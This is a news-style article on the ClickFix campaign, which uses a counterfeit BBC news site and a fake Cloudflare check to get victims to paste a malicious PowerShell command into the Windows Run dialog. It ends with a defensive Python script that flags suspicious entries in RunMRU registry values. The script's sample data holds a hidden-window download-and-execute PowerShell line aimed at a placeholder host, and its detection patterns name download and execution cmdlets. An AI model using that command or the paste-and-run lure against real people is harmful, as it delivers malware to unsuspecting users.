New ClickFix Attack Employs Counterfeit BBC News Page and Deceptive Cloudflare Verification to Mislead Users
A sophisticated new cyberthreat campaign known as the ClickFix attack has emerged, combining the impersonation of trusted news sources with deceptive security verification prompts. The attack masquerades as legitimate BBC news content and uses fake Cloudflare verification screens to deliver malware.

The attack begins when users encounter what appears to be legitimate online advertising or search results. Upon clicking, victims are redirected to a convincing replica of a BBC news website, populated with articles stolen from legitimate sources. Rather than providing authentic news, the fake site serves as a delivery mechanism for the malicious content that follows.

After browsing the fabricated news site, users encounter what looks like a standard Cloudflare security verification page but is a pixel-perfect replica of a genuine Cloudflare Turnstile challenge. These pages include authentic-looking logos and Ray ID footers that lend an air of legitimacy.
When users attempt to complete the verification, they receive instructions to perform seemingly routine steps:

1. Press Windows + R to open the Run dialog.
2. Press Ctrl + V to paste a "verification command".
3. Press Enter to execute the command.

Unbeknownst to them, clicking the verification button has already loaded a malicious PowerShell command into their system's clipboard. The command they paste and execute is not a legitimate verification tool but malicious code designed to download and install various types of malware.

The ClickFix technique has experienced explosive growth throughout 2024 and 2025, with ESET's Threat Report indicating a surge of over 517% in the first half of 2025. This makes ClickFix the second most common attack vector after phishing, accounting for nearly 8% of all blocked attacks. Cybersecurity researchers have identified multiple variants of this attack targeting different platforms and services, with attackers impersonating various trusted entities, including Microsoft and Google Chrome.
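Because the victim pastes the command into the Run dialog, Windows records it in that user's RunMRU registry key, which gives responders a place to look. The following triage sketch is an added example, not code from the article or from any vendor: it parses an exported RunMRU value set and flags PowerShell launches that match several heuristics. The function names, heuristics, threshold and sample values are assumptions constructed for illustration.

```python
import re

# Constructed sample of a user's Run-dialog history as exported from
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
# Each value ends in "\1"; MRUList gives the order, most recent first.
SAMPLE_RUNMRU = {
    "a": "cmd\\1",
    "b": "notepad C:\\Users\\alice\\notes.txt\\1",
    "c": 'powershell -w hidden -c "iex (iwr https://example.invalid/verify.txt)"'
         " # Verification ID 0000\\1",
    "d": "powershell\\1",
    "e": "powershell -NoProfile -File C:\\Scripts\\backup.ps1\\1",
    "MRUList": "ecdba",
}

# Only commands that start a PowerShell host are scored.
INTERPRETER = re.compile(
    r'^\s*"?(?:\S*\\)?(?:powershell|pwsh)(?:\.exe)?"?(?:\s|$)', re.I)

# Heuristics are assumptions of this example, not indicators from the article.
INDICATORS = {
    "hidden_window": re.compile(r"(?<![\w-])-w\w*\s+h\w*", re.I),
    "encoded": re.compile(r"(?<![\w-])-e\w*\s+[A-Za-z0-9+/=]{16,}", re.I),
    "download": re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod"
                           r"|downloadstring|downloadfile)\b", re.I),
    "execute": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "lure_text": re.compile(r"verif|captcha|robot", re.I),
}

def parse_runmru(values):
    """Return typed commands, most recent first, without the '\\1' suffix."""
    cmds = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is not None:
            cmds.append(raw[:-2] if raw.endswith("\\1") else raw)
    return cmds

def score(cmd):
    """Names of the indicators a PowerShell command line matches."""
    if not INTERPRETER.search(cmd):
        return []
    return sorted(n for n, rx in INDICATORS.items() if rx.search(cmd))

def triage(values, threshold=2):
    """Commands matching at least `threshold` indicators, with their hits."""
    scored = [(cmd, score(cmd)) for cmd in parse_runmru(values)]
    return [(cmd, hits) for cmd, hits in scored if len(hits) >= threshold]

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_RUNMRU):
        print(hits, cmd)
```

Requiring two or more indicators keeps a bare `powershell` launch or a routine `-File` script run out of the results while still surfacing the hidden download-and-execute pattern.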